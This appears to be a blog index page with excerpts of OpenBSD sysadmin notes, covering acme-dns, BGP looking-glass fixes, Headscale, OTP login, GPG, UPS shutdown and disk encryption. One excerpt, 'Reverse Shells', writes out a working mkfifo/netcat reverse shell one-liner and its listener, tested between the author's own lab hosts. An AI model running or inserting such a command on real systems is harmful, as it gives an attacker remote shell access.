OpenBSD

Web A simplified DNS server with a RESTful HTTP API to provide a simple way to automate ACME DNS challenges. Sounds promising, right ? Let’s give try ;) https://github.com/joohoi/acme-dns Setup fireup a new OpenBSD VM let’s do it in London. ip: 100.10.20.30 patch, update, add go doas su - syspatch pkg_add -Vu pkg_add go clone repo and build acme-dns cd /root git clone https://github.com/joohoi/acme-dns cd acme-dns export GOPATH=/tmp/acme-dns go build cp acme-dns /usr/local/sbin/ Create Selfsign Cert the RESTful API need’s a Cert.

I’m running a BGP Looking Glass Server on https://bgp.stoege.net, where can get some view about BGP running on the Global Internet. Upgrade to 7.2 Did an Upgrade to the latest Version with my Script. Upgrade was sucessful, but the BGP Service needs some Fix. Website show as “500 Internal Server Error”, and the Logs got a few messages like this: tail -f /var/log/messages Oct 21 11:38:07 bapi slowcgi[62677]: execve /cgi-bin/bgplg: Permission denied Oct 21 11:38:07 bapi slowcgi[93993]: caught exit of unknown child 62677 Oct 21 11:38:12 bapi slowcgi[45500]: execve /cgi-bin/bgplg: Permission denied Reapply the Permission chmod 0550 /var/www/cgi-bin/bgplg chown www:daemon /var/www/cgi-bin/bgplg chmod 0555 /var/www/bin/bgpctl chmod 4555 /var/www/bin/ping* /var/www/bin/traceroute* Check Service $ curl --head "https://bgp.

OpenBSD 7.2 finally released. Yesterday, the 53th Relase of OpenBSD got publised, the [Version 7.2)(https://www.openbsd.org/72.html). I’ll upgrade my boxes as usual with the following Script. The most obvious change is the Performance improvement for the Package Mangager, but there is always so more see undeadly Upgrade Guide As usual, follow to official Upgrade Guide. You can Upgrade with an USB Stick, ISO Image, PXE Boot or inline (from a running system).

Running Headscale Server on OpenBSD i like and widely use wireguard for my infrastructure. i’m also aware of it’s limitation and i know the tailscale project but never gave try. recently, i stumbled upon the headscale project, an opensource alternative to for the (closed) tailscale server. perfect, let’s give a try! and, of course, i’m gooing to implement this with OpenBSD, what else ;) Doku https://github.com/juanfont/headscale/blob/main/docs/running-headscale-openbsd.md https://zakaria.org/posts/headscale-setup.md on the Server compile and install server this is working on OpenBSD 7.

i don’t like ssh & password authentication. but sometime, specially during setup or recovery, it’s need and make sense. thought i’ll protect some boxes with otp. here a few notes and instrucations Build login_otp git clone https://github.com/reyk/login_otp cd login_otp make obj make all doas make install Initialize OTP DB doas otp -i Generate Key for User otp -g Name: stoege Key: xxxx xxxx xxxx xxxx xxxx xxxx xx URL: otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30 Build QR Code echo "otpauth://totp/stoege?

CLI Url Shortener wrote a little URL Shortener in Python with FastAPI and a wrapper script for cli usage. needs httpie & jq packages. python backend is under development, cli wrapper for different os right here … Usage somehost$ ./myurlshort usage: /usr/local/bin/myurlshort http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to anyhost$ ./myurlshort http://my-url-to-short.egal.world.planet.universe https://url.stoege.net/xXxXx CLI Wrappers OpenBSD cat << 'EOF' > myurlshort #!/usr/bin/env bash # url shortener for openbsd, v1.0, 2022-09-12, by @stoege which jq >/dev/null || ( echo -e "*** jq not installed ***\ndoas pkg_add jq\n"; ) which https >/dev/null || ( echo -e "*** httpie not installed ***\ndoas pkg_add httpie\n"; ) if [[ $# -ne 1 ]]; then echo -e "\nusage: $0 http://veeeeeeeeeeeeeeeeeeeeeeeeeery.

GPG and how to use it Create a Key with ECC gpg --expert --full-generate-key (9) ECC and ECC (1) Curve 25519 0 = key does not expire (or whatever you prefer!) Real name: Max Muster Email address: max@muster.net Comment: - pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid Max Muster (-) <max@muster.net> sub cv25519 2022-09-04 [E] Public Key max@host $ gpg /home/max/.gnupg/pubring.kbx ---------------------------- pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid [ultimate] Max Muster (-) <max@muster.

Reverse Shells https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://kb.systemoverlord.com/security/postex/reverse/ Test it Listen on Host A Set Lister on Host A (192.168.1.100) hostA # nc -l 4242 Start Reverse Shell on Host B hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f here we are hostA # hostname hostA.somewhere hostA # nc -l 4242 hostB # hostname hostB.somewhere nice ;) Any Comments ? sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

Shutdown Hosts on Power Outages Everybody is talking about Power Outages. Let’s assume you have a Smart-UPS for your Playground and you’d like to shut some Infrastructure to avoid some troubles with corrupt filesystems, broken vm’s and things like that. Connection UPS to APU via USB Cable dmesg show the UPS connected APU# dmesg uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ... uhidev0: iclass 3/0, 142 report ids upd0 at uhidev0 uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1 uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1 .

Intro I never used the Fulldisk Encryption Feature as there was no need for. It doesn’t make sense for Hosted VM’s, as you have to enter the Passphrase at every boot at the Console. So, it’s a pain and still possible to intercept on the Hosters Infrastructure. Disk Encryption does not make sense at home, as all my Devices remains at home (and hopefully never got stolen). It would make sense on a Notebook, but i’m more the Apple Fanboy when it comes to portable Machines.